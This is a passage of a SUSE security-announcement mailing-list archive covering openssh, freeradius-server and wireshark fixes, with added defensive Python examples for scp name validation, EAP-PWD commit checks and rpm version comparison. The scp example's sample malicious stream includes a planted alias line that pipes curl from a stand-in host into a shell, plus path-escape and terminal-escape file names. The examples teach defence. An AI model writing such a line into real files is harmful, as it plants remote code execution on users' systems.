webkit2gtk3-devel-2.24.0-2.38.2 - SUSE Linux Enterprise Server 12-SP4 (aarch64 ppc64le s390x x86_64): libjavascriptcoregtk-4_0-18-2.24.0-2.38.2 libjavascriptcoregtk-4_0-18-debuginfo-2.24.0-2.38.2 libwebkit2gtk-4_0-37-2.24.0-2.38.2 libwebkit2gtk-4_0-37-debuginfo-2.24.0-2.38.2 typelib-1_0-JavaScriptCore-4_0-2.24.0-2.38.2 typelib-1_0-WebKit2-4_0-2.24.0-2.38.2 webkit2gtk-4_0-injected-bundles-2.24.0-2.38.2 webkit2gtk-4_0-injected-bundles-debuginfo-2.24.0-2.38.2 webkit2gtk3-debugsource-2.24.0-2.38.2 - SUSE Linux Enterprise Server 12-SP3 
(aarch64 ppc64le s390x x86_64): libjavascriptcoregtk-4_0-18-2.24.0-2.38.2 libjavascriptcoregtk-4_0-18-debuginfo-2.24.0-2.38.2 libwebkit2gtk-4_0-37-2.24.0-2.38.2 libwebkit2gtk-4_0-37-debuginfo-2.24.0-2.38.2 typelib-1_0-JavaScriptCore-4_0-2.24.0-2.38.2 typelib-1_0-WebKit2-4_0-2.24.0-2.38.2 webkit2gtk-4_0-injected-bundles-2.24.0-2.38.2 webkit2gtk-4_0-injected-bundles-debuginfo-2.24.0-2.38.2 webkit2gtk3-debugsource-2.24.0-2.38.2 - SUSE Linux Enterprise Desktop 12-SP4 (x86_64): libjavascriptcoregtk-4_0-18-2.24.0-2.38.2 libjavascriptcoregtk-4_0-18-debuginfo-2.24.0-2.38.2 libwebkit2gtk-4_0-37-2.24.0-2.38.2 libwebkit2gtk-4_0-37-debuginfo-2.24.0-2.38.2 typelib-1_0-JavaScriptCore-4_0-2.24.0-2.38.2 typelib-1_0-WebKit2-4_0-2.24.0-2.38.2 webkit2gtk-4_0-injected-bundles-2.24.0-2.38.2 webkit2gtk-4_0-injected-bundles-debuginfo-2.24.0-2.38.2 webkit2gtk3-debugsource-2.24.0-2.38.2 - SUSE Linux Enterprise Desktop 12-SP4 (noarch): libwebkit2gtk3-lang-2.24.0-2.38.2 - SUSE Linux Enterprise Desktop 12-SP3 (noarch): libwebkit2gtk3-lang-2.24.0-2.38.2 - SUSE Linux Enterprise Desktop 12-SP3 (x86_64): libjavascriptcoregtk-4_0-18-2.24.0-2.38.2 libjavascriptcoregtk-4_0-18-debuginfo-2.24.0-2.38.2 libwebkit2gtk-4_0-37-2.24.0-2.38.2 libwebkit2gtk-4_0-37-debuginfo-2.24.0-2.38.2 typelib-1_0-JavaScriptCore-4_0-2.24.0-2.38.2 typelib-1_0-WebKit2-4_0-2.24.0-2.38.2 webkit2gtk-4_0-injected-bundles-2.24.0-2.38.2 webkit2gtk-4_0-injected-bundles-debuginfo-2.24.0-2.38.2 webkit2gtk3-debugsource-2.24.0-2.38.2 References: https://www.suse.com/security/cve/CVE-2019-8375.html https://bugzilla.suse.com/1126768 From sle-security-updates at lists.suse.com Thu Apr 25 07:11:00 2019 From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com) Date: Thu, 25 Apr 2019 15:11:00 +0200 (CEST) Subject: SUSE-SU-2019:14030-1: moderate: Security update for openssh Message-ID: <20190425131100.0FFE9F3D3@maintenance.suse.de> SUSE Security Update: Security update for openssh 
______________________________________________________________________________

Announcement ID: SUSE-SU-2019:14030-1
Rating: moderate
References: #1090671 #1115550 #1119183 #1121816 #1121821 #1131709
Cross-References: CVE-2019-6109 CVE-2019-6111
Affected Products:
SUSE Linux Enterprise Server 11-SP4-LTSS
SUSE Linux Enterprise Debuginfo 11-SP4
______________________________________________________________________________

An update that solves two vulnerabilities and has four fixes is now available.

Description:

This update for openssh fixes the following issues:

Security vulnerabilities addressed:
- CVE-2019-6109: Fixed a character encoding issue in the progress display of the scp client that could be used to manipulate client output, allowing for spoofing during file transfers (bsc#1121816).
- CVE-2019-6111: Properly validate object names received by the scp client to prevent arbitrary file overwrites when interacting with a malicious SSH server (bsc#1121821).

Other issues fixed:
- Fixed two race conditions in sshd relating to SIGHUP (bsc#1119183).
- Returned proper reason for port forwarding failures (bsc#1090671).
- Fixed SSHD termination of multichannel sessions with non-root users (bsc#1115550).

Patch Instructions:

To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
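The two scp client issues above come from the same place: the scp protocol lets the server announce each object with a control line (`C<mode> <size> <name>`), and the client used to trust that name both when writing the file and when printing the progress meter. The Python below is an added example, not OpenSSH code, that models the receiving side with the checks the fix adds: a name must not contain a path separator or be `.`/`..`, it must match the pattern the user actually requested (CVE-2019-6111), and it is escaped before it reaches the terminal (CVE-2019-6109). The byte stream is constructed for this example; it pretends the user ran the equivalent of `scp host:'*.txt' ./downloads/` against a hostile server, and `requested` is assumed to hold the remote path arguments with the host prefix already stripped. Directory records are refused outright on the assumption that -r was not given.

```python
import fnmatch
import io
import re
from typing import List, Tuple

# scp control lines sent by the source side:
#   C<mode> <size> <name>   a file, followed by <size> body bytes and a \0
#   D<mode> <size> <name>   a directory (only with -r)
#   E                       end of directory
_CONTROL = re.compile(rb"^([CD])([0-7]{4}) (\d+) (.*)$")


class ScpRejected(Exception):
    """Raised when the server announces an object the client must not accept."""


def validate_name(name: str, requested: List[str]) -> None:
    """Checks applied to a server-announced object name.

    1. No path separators and no '.'/'..', so the write stays in the target dir.
    2. The name must match the basename of one of the arguments the user
       asked for: a server must not be able to push an unrequested file such
       as .bash_aliases into the destination directory (CVE-2019-6111).
    """
    if not name or "/" in name or name in (".", ".."):
        raise ScpRejected(f"unsafe object name {name!r}")
    patterns = [p.rsplit("/", 1)[-1] for p in requested]
    if not any(fnmatch.fnmatchcase(name, pat) for pat in patterns):
        raise ScpRejected(f"received {name!r}, not matched by requested pattern(s) {patterns}")


def printable(name: str) -> str:
    """Render a name for the progress meter with control bytes escaped; raw
    ANSI sequences in a name could otherwise rewrite the terminal (CVE-2019-6109)."""
    return "".join(ch if 0x20 <= ord(ch) < 0x7F else f"\\x{ord(ch):02x}" for ch in name)


def sink(stream: bytes, requested: List[str]) -> Tuple[List[Tuple[str, bytes]], List[str]]:
    """Consume a source-to-sink scp stream; return (accepted files, rejection reasons)."""
    buf = io.BytesIO(stream)
    accepted: List[Tuple[str, bytes]] = []
    rejected: List[str] = []
    while True:
        line = buf.readline()
        if not line:
            break
        line = line.rstrip(b"\n")
        if line == b"E":
            rejected.append("end-of-directory record refused (no -r)")
            continue
        m = _CONTROL.match(line)
        if not m:
            rejected.append(f"malformed control line {line!r}")
            break
        kind, _mode, size, raw_name = m.groups()
        name = raw_name.decode("utf-8", "replace")
        if kind == b"D":
            rejected.append(f"directory record {printable(name)!r} refused (no -r)")
            continue
        body = buf.read(int(size))
        buf.read(1)  # the \0 the source sends after the file body
        try:
            validate_name(name, requested)
        except ScpRejected as exc:
            rejected.append(str(exc))
            continue  # body already consumed, so the stream stays in sync
        accepted.append((name, body))
    return accepted, rejected


# Constructed hostile server stream: two files the user asked for, one the
# server hopes to plant, and one that tries to escape the target directory.
SAMPLE_STREAM = (
    b"C0644 5 notes.txt\n" + b"hello" + b"\0"
    + b"C0644 24 .bash_aliases\n" + b"alias ls='curl evil|sh'\n" + b"\0"
    + b"C0644 3 \x1b[2Jreport.txt\n" + b"abc" + b"\0"
    + b"C0644 4 ../x.txt\n" + b"pwnd" + b"\0"
)

if __name__ == "__main__":
    ok, bad = sink(SAMPLE_STREAM, ["*.txt"])
    for name, body in ok:
        print(f"accepted {printable(name)} ({len(body)} bytes)")
    for reason in bad:
        print("rejected:", reason)
```

Note that `\x1b[2Jreport.txt` is accepted as a file, because it does match `*.txt`; the 6109 fix is about how such a name is displayed, not whether it is stored, which is why `printable` is a separate step from `validate_name`.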
Alternatively you can run the command listed for your product: - SUSE Linux Enterprise Server 11-SP4-LTSS: zypper in -t patch slessp4-openssh-14030=1 - SUSE Linux Enterprise Debuginfo 11-SP4: zypper in -t patch dbgsp4-openssh-14030=1 Package List: - SUSE Linux Enterprise Server 11-SP4-LTSS (i586 ppc64 s390x x86_64): openssh-6.6p1-36.20.1 openssh-askpass-gnome-6.6p1-36.20.1 openssh-fips-6.6p1-36.20.1 openssh-helpers-6.6p1-36.20.1 - SUSE Linux Enterprise Debuginfo 11-SP4 (i586 ppc64 s390x x86_64): openssh-askpass-gnome-debuginfo-6.6p1-36.20.1 openssh-debuginfo-6.6p1-36.20.1 openssh-debugsource-6.6p1-36.20.1 References: https://www.suse.com/security/cve/CVE-2019-6109.html https://www.suse.com/security/cve/CVE-2019-6111.html https://bugzilla.suse.com/1090671 https://bugzilla.suse.com/1115550 https://bugzilla.suse.com/1119183 https://bugzilla.suse.com/1121816 https://bugzilla.suse.com/1121821 https://bugzilla.suse.com/1131709 From sle-security-updates at lists.suse.com Thu Apr 25 10:10:41 2019 From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com) Date: Thu, 25 Apr 2019 18:10:41 +0200 (CEST) Subject: SUSE-SU-2019:1039-1: important: Security update for freeradius-server Message-ID: <20190425161041.D5769F3D3@maintenance.suse.de> SUSE Security Update: Security update for freeradius-server ______________________________________________________________________________ Announcement ID: SUSE-SU-2019:1039-1 Rating: important References: #1132549 #1132664 Cross-References: CVE-2019-11234 CVE-2019-11235 Affected Products: SUSE OpenStack Cloud 7 SUSE Linux Enterprise Server for SAP 12-SP2 SUSE Linux Enterprise Server for SAP 12-SP1 SUSE Linux Enterprise Server 12-SP2-LTSS SUSE Linux Enterprise Server 12-SP2-BCL SUSE Linux Enterprise Server 12-SP1-LTSS SUSE Linux Enterprise Server 12-LTSS SUSE Enterprise Storage 4 ______________________________________________________________________________ An update that fixes two vulnerabilities is now available. 
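The two EAP-PWD problems in the freeradius-server advisory SUSE-SU-2019:1039-1 (CVE-2019-11234 and CVE-2019-11235, described below) are both about what a server must verify in the peer's Commit frame before using it. The Python below is an added example, not FreeRADIUS code: it implements the checks over NIST P-256 using only integer arithmetic, so it runs without any library. Point validation rejects elements that are off the curve or outside the prime-order subgroup (the invalid-curve class, CVE-2019-11235), a range check bounds the scalar, and the reflection check refuses a Commit that simply echoes the server's own scalar or element (CVE-2019-11234). `make_commit` is a deliberate simplification and an assumption of this example: it uses the generator in place of the password element and omits the random mask that RFC 5931 mixes in, which does not change the validation logic.

```python
# NIST P-256 domain parameters (FIPS 186-4).
P = 0xffffffff00000001000000000000000000000000ffffffffffffffffffffffff
A = P - 3
B = 0x5ac635d8aa3a93e7b3ebbd55769886bc651d06b0cc53b0f63bce3c3e27d2604b
N = 0xffffffff00000000ffffffffffffffffbce6faada7179e84f3b9cac2fc632551  # group order q
G = (0x6b17d1f2e12c4247f8bce6e563a440f277037d812deb33a0f4a13945d898c296,
     0x4fe342e2fe1a7f9b8ee7eb4a7c0f9e162bce33576b315ececbb6406837bf51f5)

# Points are affine (x, y) tuples; None is the point at infinity.


def is_on_curve(pt) -> bool:
    """True if pt is a finite point satisfying y^2 = x^3 + ax + b (mod p)."""
    if pt is None:
        return False
    x, y = pt
    return 0 <= x < P and 0 <= y < P and (y * y - (x * x * x + A * x + B)) % P == 0


def ec_add(p1, p2):
    """Affine point addition with doubling and infinity handled."""
    if p1 is None:
        return p2
    if p2 is None:
        return p1
    x1, y1 = p1
    x2, y2 = p2
    if x1 == x2:
        if (y1 + y2) % P == 0:
            return None  # p1 == -p2
        lam = (3 * x1 * x1 + A) * pow(2 * y1, -1, P) % P
    else:
        lam = (y2 - y1) * pow(x2 - x1, -1, P) % P
    x3 = (lam * lam - x1 - x2) % P
    y3 = (lam * (x1 - x3) - y1) % P
    return (x3, y3)


def ec_mul(k: int, pt):
    """Double-and-add scalar multiplication (not constant-time; fine for validation)."""
    result, addend = None, pt
    while k:
        if k & 1:
            result = ec_add(result, addend)
        addend = ec_add(addend, addend)
        k >>= 1
    return result


def make_commit(secret: int, pwe=G):
    """Simplified Commit (assumption): scalar = secret mod q, element = secret * PWE.
    RFC 5931 also folds a random mask into both values; PWE defaults to G only
    so that this example is self-contained."""
    return (secret % N, ec_mul(secret, pwe))


def validate_peer_commit(own, peer):
    """Return (accepted, reason) for a peer Commit, given our own Commit."""
    own_scalar, own_element = own
    peer_scalar, peer_element = peer
    if not (1 < peer_scalar < N):
        return False, "scalar outside [2, q-1]"
    if not is_on_curve(peer_element):
        return False, "element not on the curve (invalid-curve attack, CVE-2019-11235 class)"
    if ec_mul(N, peer_element) is not None:
        # Redundant on P-256 (cofactor 1) but cheap, and it matters on curves
        # with a cofactor, where an on-curve point can still be a small-order one.
        return False, "element not in the prime-order subgroup"
    if peer_scalar == own_scalar or peer_element == own_element:
        return False, "peer reflected our own Commit (reflection attack, CVE-2019-11234 class)"
    return True, "ok"


if __name__ == "__main__":
    server = make_commit(0x1234567)
    peer = make_commit(0x89abcdef)
    bogus_x, bogus_y = peer[1]
    print("honest peer:   ", validate_peer_commit(server, peer))
    print("reflection:    ", validate_peer_commit(server, server))
    print("off-curve:     ", validate_peer_commit(server, (peer[0], (bogus_x, (bogus_y + 1) % P))))
    print("zero scalar:   ", validate_peer_commit(server, (0, peer[1])))
```

The order of the checks matters: the subgroup test multiplies by q, so it must only run on a point already known to be on the curve, and the reflection test is last because a reflected Commit is otherwise perfectly well-formed.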
Description:

This update for freeradius-server fixes the following issues:

Security issues fixed:
- CVE-2019-11235: Fixed an authentication bypass related to the EAP-PWD Commit frame and insufficient validation of elliptic curve points (bsc#1132549).
- CVE-2019-11234: Fixed an authentication bypass caused by reflecting previously sent values back to the server (bsc#1132664).

Patch Instructions:

To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".

Alternatively you can run the command listed for your product:

- SUSE OpenStack Cloud 7:
  zypper in -t patch SUSE-OpenStack-Cloud-7-2019-1039=1
- SUSE Linux Enterprise Server for SAP 12-SP2:
  zypper in -t patch SUSE-SLE-SAP-12-SP2-2019-1039=1
- SUSE Linux Enterprise Server for SAP 12-SP1:
  zypper in -t patch SUSE-SLE-SAP-12-SP1-2019-1039=1
- SUSE Linux Enterprise Server 12-SP2-LTSS:
  zypper in -t patch SUSE-SLE-SERVER-12-SP2-2019-1039=1
- SUSE Linux Enterprise Server 12-SP2-BCL:
  zypper in -t patch SUSE-SLE-SERVER-12-SP2-BCL-2019-1039=1
- SUSE Linux Enterprise Server 12-SP1-LTSS:
  zypper in -t patch SUSE-SLE-SERVER-12-SP1-2019-1039=1
- SUSE Linux Enterprise Server 12-LTSS:
  zypper in -t patch SUSE-SLE-SERVER-12-2019-1039=1
- SUSE Enterprise Storage 4:
  zypper in -t patch SUSE-Storage-4-2019-1039=1

Package List:

- SUSE OpenStack Cloud 7 (s390x x86_64):
  freeradius-server-3.0.3-17.12.1
  freeradius-server-debuginfo-3.0.3-17.12.1
  freeradius-server-debugsource-3.0.3-17.12.1
  freeradius-server-doc-3.0.3-17.12.1
  freeradius-server-krb5-3.0.3-17.12.1
  freeradius-server-krb5-debuginfo-3.0.3-17.12.1
  freeradius-server-ldap-3.0.3-17.12.1
  freeradius-server-ldap-debuginfo-3.0.3-17.12.1
  freeradius-server-libs-3.0.3-17.12.1
  freeradius-server-libs-debuginfo-3.0.3-17.12.1
  freeradius-server-mysql-3.0.3-17.12.1
  freeradius-server-mysql-debuginfo-3.0.3-17.12.1
  freeradius-server-perl-3.0.3-17.12.1
  freeradius-server-perl-debuginfo-3.0.3-17.12.1
  freeradius-server-postgresql-3.0.3-17.12.1
freeradius-server-postgresql-debuginfo-3.0.3-17.12.1 freeradius-server-python-3.0.3-17.12.1 freeradius-server-python-debuginfo-3.0.3-17.12.1 freeradius-server-sqlite-3.0.3-17.12.1 freeradius-server-sqlite-debuginfo-3.0.3-17.12.1 freeradius-server-utils-3.0.3-17.12.1 freeradius-server-utils-debuginfo-3.0.3-17.12.1 - SUSE Linux Enterprise Server for SAP 12-SP2 (ppc64le x86_64): freeradius-server-3.0.3-17.12.1 freeradius-server-debuginfo-3.0.3-17.12.1 freeradius-server-debugsource-3.0.3-17.12.1 freeradius-server-doc-3.0.3-17.12.1 freeradius-server-krb5-3.0.3-17.12.1 freeradius-server-krb5-debuginfo-3.0.3-17.12.1 freeradius-server-ldap-3.0.3-17.12.1 freeradius-server-ldap-debuginfo-3.0.3-17.12.1 freeradius-server-libs-3.0.3-17.12.1 freeradius-server-libs-debuginfo-3.0.3-17.12.1 freeradius-server-mysql-3.0.3-17.12.1 freeradius-server-mysql-debuginfo-3.0.3-17.12.1 freeradius-server-perl-3.0.3-17.12.1 freeradius-server-perl-debuginfo-3.0.3-17.12.1 freeradius-server-postgresql-3.0.3-17.12.1 freeradius-server-postgresql-debuginfo-3.0.3-17.12.1 freeradius-server-python-3.0.3-17.12.1 freeradius-server-python-debuginfo-3.0.3-17.12.1 freeradius-server-sqlite-3.0.3-17.12.1 freeradius-server-sqlite-debuginfo-3.0.3-17.12.1 freeradius-server-utils-3.0.3-17.12.1 freeradius-server-utils-debuginfo-3.0.3-17.12.1 - SUSE Linux Enterprise Server for SAP 12-SP1 (x86_64): freeradius-server-3.0.3-17.12.1 freeradius-server-debuginfo-3.0.3-17.12.1 freeradius-server-debugsource-3.0.3-17.12.1 freeradius-server-doc-3.0.3-17.12.1 freeradius-server-krb5-3.0.3-17.12.1 freeradius-server-krb5-debuginfo-3.0.3-17.12.1 freeradius-server-ldap-3.0.3-17.12.1 freeradius-server-ldap-debuginfo-3.0.3-17.12.1 freeradius-server-libs-3.0.3-17.12.1 freeradius-server-libs-debuginfo-3.0.3-17.12.1 freeradius-server-mysql-3.0.3-17.12.1 freeradius-server-mysql-debuginfo-3.0.3-17.12.1 freeradius-server-perl-3.0.3-17.12.1 freeradius-server-perl-debuginfo-3.0.3-17.12.1 freeradius-server-postgresql-3.0.3-17.12.1 
freeradius-server-postgresql-debuginfo-3.0.3-17.12.1 freeradius-server-python-3.0.3-17.12.1 freeradius-server-python-debuginfo-3.0.3-17.12.1 freeradius-server-sqlite-3.0.3-17.12.1 freeradius-server-sqlite-debuginfo-3.0.3-17.12.1 freeradius-server-utils-3.0.3-17.12.1 freeradius-server-utils-debuginfo-3.0.3-17.12.1 - SUSE Linux Enterprise Server 12-SP2-LTSS (ppc64le s390x x86_64): freeradius-server-3.0.3-17.12.1 freeradius-server-debuginfo-3.0.3-17.12.1 freeradius-server-debugsource-3.0.3-17.12.1 freeradius-server-doc-3.0.3-17.12.1 freeradius-server-krb5-3.0.3-17.12.1 freeradius-server-krb5-debuginfo-3.0.3-17.12.1 freeradius-server-ldap-3.0.3-17.12.1 freeradius-server-ldap-debuginfo-3.0.3-17.12.1 freeradius-server-libs-3.0.3-17.12.1 freeradius-server-libs-debuginfo-3.0.3-17.12.1 freeradius-server-mysql-3.0.3-17.12.1 freeradius-server-mysql-debuginfo-3.0.3-17.12.1 freeradius-server-perl-3.0.3-17.12.1 freeradius-server-perl-debuginfo-3.0.3-17.12.1 freeradius-server-postgresql-3.0.3-17.12.1 freeradius-server-postgresql-debuginfo-3.0.3-17.12.1 freeradius-server-python-3.0.3-17.12.1 freeradius-server-python-debuginfo-3.0.3-17.12.1 freeradius-server-sqlite-3.0.3-17.12.1 freeradius-server-sqlite-debuginfo-3.0.3-17.12.1 freeradius-server-utils-3.0.3-17.12.1 freeradius-server-utils-debuginfo-3.0.3-17.12.1 - SUSE Linux Enterprise Server 12-SP2-BCL (x86_64): freeradius-server-3.0.3-17.12.1 freeradius-server-debuginfo-3.0.3-17.12.1 freeradius-server-debugsource-3.0.3-17.12.1 freeradius-server-doc-3.0.3-17.12.1 freeradius-server-krb5-3.0.3-17.12.1 freeradius-server-krb5-debuginfo-3.0.3-17.12.1 freeradius-server-ldap-3.0.3-17.12.1 freeradius-server-ldap-debuginfo-3.0.3-17.12.1 freeradius-server-libs-3.0.3-17.12.1 freeradius-server-libs-debuginfo-3.0.3-17.12.1 freeradius-server-mysql-3.0.3-17.12.1 freeradius-server-mysql-debuginfo-3.0.3-17.12.1 freeradius-server-perl-3.0.3-17.12.1 freeradius-server-perl-debuginfo-3.0.3-17.12.1 freeradius-server-postgresql-3.0.3-17.12.1 
freeradius-server-postgresql-debuginfo-3.0.3-17.12.1 freeradius-server-python-3.0.3-17.12.1 freeradius-server-python-debuginfo-3.0.3-17.12.1 freeradius-server-sqlite-3.0.3-17.12.1 freeradius-server-sqlite-debuginfo-3.0.3-17.12.1 freeradius-server-utils-3.0.3-17.12.1 freeradius-server-utils-debuginfo-3.0.3-17.12.1 - SUSE Linux Enterprise Server 12-SP1-LTSS (ppc64le s390x x86_64): freeradius-server-3.0.3-17.12.1 freeradius-server-debuginfo-3.0.3-17.12.1 freeradius-server-debugsource-3.0.3-17.12.1 freeradius-server-doc-3.0.3-17.12.1 freeradius-server-krb5-3.0.3-17.12.1 freeradius-server-krb5-debuginfo-3.0.3-17.12.1 freeradius-server-ldap-3.0.3-17.12.1 freeradius-server-ldap-debuginfo-3.0.3-17.12.1 freeradius-server-libs-3.0.3-17.12.1 freeradius-server-libs-debuginfo-3.0.3-17.12.1 freeradius-server-mysql-3.0.3-17.12.1 freeradius-server-mysql-debuginfo-3.0.3-17.12.1 freeradius-server-perl-3.0.3-17.12.1 freeradius-server-perl-debuginfo-3.0.3-17.12.1 freeradius-server-postgresql-3.0.3-17.12.1 freeradius-server-postgresql-debuginfo-3.0.3-17.12.1 freeradius-server-python-3.0.3-17.12.1 freeradius-server-python-debuginfo-3.0.3-17.12.1 freeradius-server-sqlite-3.0.3-17.12.1 freeradius-server-sqlite-debuginfo-3.0.3-17.12.1 freeradius-server-utils-3.0.3-17.12.1 freeradius-server-utils-debuginfo-3.0.3-17.12.1 - SUSE Linux Enterprise Server 12-LTSS (ppc64le s390x x86_64): freeradius-server-3.0.3-17.12.1 freeradius-server-debuginfo-3.0.3-17.12.1 freeradius-server-debugsource-3.0.3-17.12.1 freeradius-server-doc-3.0.3-17.12.1 freeradius-server-krb5-3.0.3-17.12.1 freeradius-server-krb5-debuginfo-3.0.3-17.12.1 freeradius-server-ldap-3.0.3-17.12.1 freeradius-server-ldap-debuginfo-3.0.3-17.12.1 freeradius-server-libs-3.0.3-17.12.1 freeradius-server-libs-debuginfo-3.0.3-17.12.1 freeradius-server-mysql-3.0.3-17.12.1 freeradius-server-mysql-debuginfo-3.0.3-17.12.1 freeradius-server-perl-3.0.3-17.12.1 freeradius-server-perl-debuginfo-3.0.3-17.12.1 freeradius-server-postgresql-3.0.3-17.12.1 
  freeradius-server-postgresql-debuginfo-3.0.3-17.12.1
  freeradius-server-python-3.0.3-17.12.1
  freeradius-server-python-debuginfo-3.0.3-17.12.1
  freeradius-server-sqlite-3.0.3-17.12.1
  freeradius-server-sqlite-debuginfo-3.0.3-17.12.1
  freeradius-server-utils-3.0.3-17.12.1
  freeradius-server-utils-debuginfo-3.0.3-17.12.1
- SUSE Enterprise Storage 4 (x86_64):
  freeradius-server-3.0.3-17.12.1
  freeradius-server-debuginfo-3.0.3-17.12.1
  freeradius-server-debugsource-3.0.3-17.12.1
  freeradius-server-doc-3.0.3-17.12.1
  freeradius-server-krb5-3.0.3-17.12.1
  freeradius-server-krb5-debuginfo-3.0.3-17.12.1
  freeradius-server-ldap-3.0.3-17.12.1
  freeradius-server-ldap-debuginfo-3.0.3-17.12.1
  freeradius-server-libs-3.0.3-17.12.1
  freeradius-server-libs-debuginfo-3.0.3-17.12.1
  freeradius-server-mysql-3.0.3-17.12.1
  freeradius-server-mysql-debuginfo-3.0.3-17.12.1
  freeradius-server-perl-3.0.3-17.12.1
  freeradius-server-perl-debuginfo-3.0.3-17.12.1
  freeradius-server-postgresql-3.0.3-17.12.1
  freeradius-server-postgresql-debuginfo-3.0.3-17.12.1
  freeradius-server-python-3.0.3-17.12.1
  freeradius-server-python-debuginfo-3.0.3-17.12.1
  freeradius-server-sqlite-3.0.3-17.12.1
  freeradius-server-sqlite-debuginfo-3.0.3-17.12.1
  freeradius-server-utils-3.0.3-17.12.1
  freeradius-server-utils-debuginfo-3.0.3-17.12.1

References:

https://www.suse.com/security/cve/CVE-2019-11234.html
https://www.suse.com/security/cve/CVE-2019-11235.html
https://bugzilla.suse.com/1132549
https://bugzilla.suse.com/1132664

From sle-security-updates at lists.suse.com Thu Apr 25 10:12:34 2019
From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com)
Date: Thu, 25 Apr 2019 18:12:34 +0200 (CEST)
Subject: SUSE-SU-2019:1036-1: moderate: Security update for wireshark
Message-ID: <20190425161234.A6AE8F3D3@maintenance.suse.de>

SUSE Security Update: Security update for wireshark
______________________________________________________________________________

Announcement ID:    SUSE-SU-2019:1036-1
Rating:             moderate
References:         #1131945
Cross-References:   CVE-2019-10894 CVE-2019-10895 CVE-2019-10896 CVE-2019-10899
                    CVE-2019-10901 CVE-2019-10903
Affected Products:
                    SUSE Linux Enterprise Module for Desktop Applications 15
                    SUSE Linux Enterprise Module for Basesystem 15
______________________________________________________________________________

An update that fixes 6 vulnerabilities is now available.

Description:

This update for wireshark to version 2.4.14 fixes the following issues:

Security issues fixed:

- CVE-2019-10895: NetScaler file parser crash.
- CVE-2019-10899: SRVLOC dissector crash.
- CVE-2019-10894: GSS-API dissector crash.
- CVE-2019-10896: DOF dissector crash.
- CVE-2019-10901: LDSS dissector crash.
- CVE-2019-10903: DCERPC SPOOLSS dissector crash.

Each of these is a denial of service of the analysis tool itself: a malformed packet injected on the wire or carried in a capture file the analyst is persuaded to open crashes the dissector.

Non-security issue fixed:

- Update to version 2.4.14 (bsc#1131945).

Patch Instructions:

To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".

Alternatively you can run the command listed for your product:

- SUSE Linux Enterprise Module for Desktop Applications 15:
  zypper in -t patch SUSE-SLE-Module-Desktop-Applications-15-2019-1036=1
- SUSE Linux Enterprise Module for Basesystem 15:
  zypper in -t patch SUSE-SLE-Module-Basesystem-15-2019-1036=1

Package List:

- SUSE Linux Enterprise Module for Desktop Applications 15 (aarch64 ppc64le s390x x86_64):
  wireshark-debuginfo-2.4.14-3.25.2
  wireshark-debugsource-2.4.14-3.25.2
  wireshark-devel-2.4.14-3.25.2
  wireshark-ui-qt-2.4.14-3.25.2
  wireshark-ui-qt-debuginfo-2.4.14-3.25.2
- SUSE Linux Enterprise Module for Basesystem 15 (aarch64 ppc64le s390x x86_64):
  libwireshark9-2.4.14-3.25.2
  libwireshark9-debuginfo-2.4.14-3.25.2
  libwiretap7-2.4.14-3.25.2
  libwiretap7-debuginfo-2.4.14-3.25.2
  libwscodecs1-2.4.14-3.25.2
  libwscodecs1-debuginfo-2.4.14-3.25.2
  libwsutil8-2.4.14-3.25.2
  libwsutil8-debuginfo-2.4.14-3.25.2
  wireshark-2.4.14-3.25.2
  wireshark-debuginfo-2.4.14-3.25.2
  wireshark-debugsource-2.4.14-3.25.2

References:
https://www.suse.com/security/cve/CVE-2019-10894.html
https://www.suse.com/security/cve/CVE-2019-10895.html
https://www.suse.com/security/cve/CVE-2019-10896.html
https://www.suse.com/security/cve/CVE-2019-10899.html
https://www.suse.com/security/cve/CVE-2019-10901.html
https://www.suse.com/security/cve/CVE-2019-10903.html
https://bugzilla.suse.com/1131945

From sle-security-updates at lists.suse.com Thu Apr 25 10:13:18 2019
From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com)
Date: Thu, 25 Apr 2019 18:13:18 +0200 (CEST)
Subject: SUSE-SU-2019:1038-1: moderate: Security update for wireshark
Message-ID: <20190425161318.B1741F3D3@maintenance.suse.de>

SUSE Security Update: Security update for wireshark
______________________________________________________________________________

Announcement ID:    SUSE-SU-2019:1038-1
Rating:             moderate
References:         #1131945
Cross-References:   CVE-2019-10894 CVE-2019-10895 CVE-2019-10896 CVE-2019-10899
                    CVE-2019-10901 CVE-2019-10903
Affected Products:
                    SUSE Linux Enterprise Software Development Kit 12-SP4
                    SUSE Linux Enterprise Software Development Kit 12-SP3
                    SUSE Linux Enterprise Server 12-SP4
                    SUSE Linux Enterprise Server 12-SP3
                    SUSE Linux Enterprise Desktop 12-SP4
                    SUSE Linux Enterprise Desktop 12-SP3
______________________________________________________________________________

An update that fixes 6 vulnerabilities is now available.

Description:

This update for wireshark to version 2.4.14 fixes the following issues:

Security issues fixed:

- CVE-2019-10895: NetScaler file parser crash.
- CVE-2019-10899: SRVLOC dissector crash.
- CVE-2019-10894: GSS-API dissector crash.
- CVE-2019-10896: DOF dissector crash.
- CVE-2019-10901: LDSS dissector crash.
- CVE-2019-10903: DCERPC SPOOLSS dissector crash.

Non-security issue fixed:

- Update to version 2.4.14 (bsc#1131945).

Patch Instructions:

To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
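The package list for each product below names the exact build that carries the fix. "zypper patch" resolves that for you, but when auditing hosts you cannot touch interactively the check is to compare what rpm reports against those builds using rpm's own version ordering, which is not plain string or numeric comparison. The following is an added example, not SUSE tooling: a re-implementation of rpm's segment-wise version comparison and a function that reports which installed packages are still older than the advisory's build. The FIXED list is taken from this advisory's SUSE Linux Enterprise Server 12-SP4 entry; every INSTALLED entry is invented for the demonstration, and the function and variable names are this example's own.

```python
"""Compare installed RPM builds with the fixed builds named in an advisory.
Added example, not SUSE tooling.  rpmvercmp() re-implements rpm's version
ordering (digit runs compare numerically, letter runs lexically, a numeric
segment outranks an alphabetic one, '~' sorts before anything); epochs and
the '^' separator are not handled."""
import re

_SEGMENT = re.compile(r"\d+|[A-Za-z]+|~")


def rpmvercmp(a, b):
    """Return -1, 0 or 1 as rpm would order version strings a and b."""
    if a == b:
        return 0
    sa, sb = _SEGMENT.findall(a), _SEGMENT.findall(b)
    for x, y in zip(sa, sb):
        if x == "~" or y == "~":             # tilde marks a pre-release: sorts lowest
            if x != y:
                return -1 if x == "~" else 1
            continue
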